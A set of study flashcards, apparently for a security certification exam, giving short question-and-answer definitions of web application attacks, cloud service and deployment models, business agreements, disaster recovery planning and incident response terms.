Chapters 11-14: Application/Cloud/Organizational security and Disaster planning Flashcards
Which application exploit accesses directories on the target machine that regular clients do not?
Directory traversal
What is a type of injection attack which exploits a common XML parser feature. Attackers can use it to steal data or issue commands to other applications through an insecure parser
XML External Entities (XXE)
Which type of attack allows remote code execution on client browsers using client side scripting in web pages. They allow the attacker to gain control of the end user’s browser or login session.
Cross-site scripting (XSS)
Which type of attack occurs when data stored in some storage format like JSON is converted back into its original form and directly used as program input. If the serialized data is under user control, it can be malformed to cause DoS, SQL injection, or remote code execution.
Insecure de-serialization
Which type of operation retrieves an object a pointer is pointing to. May be used on a null pointer to crash an application, bypass a security function, or return useful debug information.
De-referencing
Which error occurs during race conditions when something is changed between when you checked something and used the result of the check?
Time of check to time of use (TOCTOU)
Which attack inserts code into a running process by forcing it to load executable code from a shared library file?
DLL injection
In which XSS technique is the script uploaded to the server?
Stored/Persistent
In which XSS technique is the script placed into a server request?
Reflected/Non-persistent
In which XSS technique does the script never get placed in the server, bu instead takes place entirely in the model browsers use to render content?
Document Object Model (DOM) based
Which attack exploits the site’s trust of the user?
Cross-site request forgery (CSRF or XSRF)
Which attack is like a CSRF, but exploits vulnerabilities in the server?
Server side request forgery (SSRF)
What technique prevents attacks like injection and buffer overflow by validating all input received before processing it?
Input validation
Which technique protects backend databases by adding escape characters so that input resembling code won’t be treated as such?
Input Sanitization
Which cloud service model is subscription-based access to applications or databases. Sometimes referred to as “on-demand software”
Software as a Service (SaaS)
Which cloud service model provides access to a computing platform or software environment the cloud customer (CC) can use to develop and host web-based applications
Platform as a Service (PaaS)
Which cloud service model provides access to computing and networking resources themselves, such as storage devices, processing, entire computers, and even whole networks?
Infrastructure as a Service (IaaS)
Which cloud service model includes storage as a service, information as a service, security as a service and so on?
Anything as a Service (XaaS)
In which cloud deployment model is access to the service available to the general public, for free or for a fee? It can be owned and hosted by any sort of public or private organization.
Public
In which cloud deployment model is the service accessible only to a single organization, though it is shared among multiple divisions or business units. It might be on-premises or off, and it might be owned and managed by the organization itself or a third party.
Private
In which cloud deployment model is the service shared between a group of organizations with shared concerns and needs, for example, organizational mission or specific technical, policy, or security requirements. It may be hosted by one, by a third party, or as a cooperative venture.
Community
The service has some combination of public, private, and community cloud characteristics under one shared hardware or software infrastructure. For example, a provider of public cloud services might also host private clouds for large customers with higher security needs or other specialized requirements.
Hybrid
Which cloud technology can virtually segment and isolate a specific customer’s cloud within a larger public cloud to prevent one from affecting the other.
Virtual Private Cloud (VPC)
What is a server on the local network which can perform data standardization, reduction, and preliminary analysis. In cloud computing, data is passed to this entity after a collection point.
Fog node (Fog computing)
What is similar to a fog node, but performs processing directly on source devices and forms a peer-to-peer network.
Edge devices (Edge computing)
Sender Policy Frameworks (SPF), Domain Keys Identified Mail (DKIM) and Domain-based Message Authentication, Reporting and Conformance (DMARC) are examples of what?
Email security controls that help identify message which may be forged
What is a business agreement that is a less formal agreement of mutual goals?
Memorandum of Understanding (MOU)
What is a business agreement which is security focused and specifies the technical requirements involved in creating and maintaining a secure connection?
Interconnection Security Agreement (ISA)
What is a written agreement defining the general relationship between business partners. At the least, it defines how each organization shares profits, losses, property, and liability
Business Partnership Agreement (BPA)
What is a formal definition of a service provided to or by the organization, typically including expectations for
performance, reliability, and other service metrics.
Service-level agreement (SLA)
What is an attack that only occurs when a modem is being used. It is used to perform mechanized scanning of a roll of telephone numbers.
War dialing
What is a metallic enclosure that prevents the entry or escape of an electromagnetic field (EM).
Faraday cage
What is a document that includes analysis of risks to business operations, controls to mitigate them, and procedure for maintaining or restoring service in the event of a disaster?
Business Continuity Plan (BCP)
What document identifies critical business functions and how long the business can operate without them?
Business Impact Analysis (BIA)
What document is a risk assessment that is specific to a single site or facility
Site risk assessment
What document contains technical procedures for restoring services and operations after a significant disruption?
Disaster Recovery Plan (DRP)
Which document contains procedures for restoring individual information systems after a disaster?
Information system contingency plan (ISCP)
Which document contains procedures for moving critical operations to a temporary site?
Continuity of operations plan (COOP)
What document contains procedures for communications in the event of a disaster?
Crisis Communications Plan
What document contains procedures for managing sudden changes in personnel?
Succession Plan
What are the 5 steps in creating a BIA
- Identify mission essential functions (MEFs)
- Identify systems, resources or even other functions used by each critical function
- Prioritize critical functions according to maximum tolerable downtime (MTD)
- Identify threats
- Determine mitigation techniques for each threat
Which recovery objective is the maximum expected amount of downtime?
Recovery Time Objective (RTO)
Which recovery objective is the maximum expected period for which data will be lost in the case of disaster.
Recovery Point Objective (RPO)
What redundancy strategy refers to connections allowing multiple paths between two points, so that an interruption to one won’t interrupt
service.
Multipathing
What redundancy strategy is a form of link aggregation which joins multiple NICs on one host to the same network, while behaving as a single virtual adapter with a shared address.
NIC Teaming
Which technology is like SIEM as in it automates and analyzes security data, but the goal is to streamline and standardize incident response workflows.
Security Orchestration, Automation, and Response (SOAR)
What is a set of conditional steps that must be performed as part of any security process, such as a log review?
Runbook
What is a looser workflow or checklist that is used to organize or document a security response process?
Playbook
The goals of what process is to keep the incident from escalating and to minimize operational impact to the organization.
Containment
Once you know you won’t be losing or destroying valuable evidence, you can get on with the next step: eliminating the root cause of a problem and repairing any affected systems. What is this process?
Eradication
What is a notification sent from an organization’s legal team to employees instructing them not to delete electronically stored information (ESI) or discard paper documents that may be relevant to a new or imminent legal case?
Legal hold
What are the 5 steps to eDiscovery?
- Determine what data needs to be collected
- Include any information placed on a legal hold
- Security physical and remove access to any systems or data relevant to the investigation
- Document the scene as you found it
- Secure the confidentiality, integrity and authenticity of your finding
Which cloud model is represented as a pay per use model?
SaaS
This is a form of malicious link that prepends a special data string before the URL to hide the nature of a false login site. For example, the following link might open a fake login page for your bank while bypassing the browser security features that would
otherwise warn you in the address bar.
Prepending
These are messages containing links or other content designed to steal user information. The archetypical example links to a facsimile of a secure website like a bank. When victims attempt to log in, the attacker captures their username and password.
Credential Harvesting
This is spam sent by instant message
SPIM
This is spam sent by VoIP
SPIT
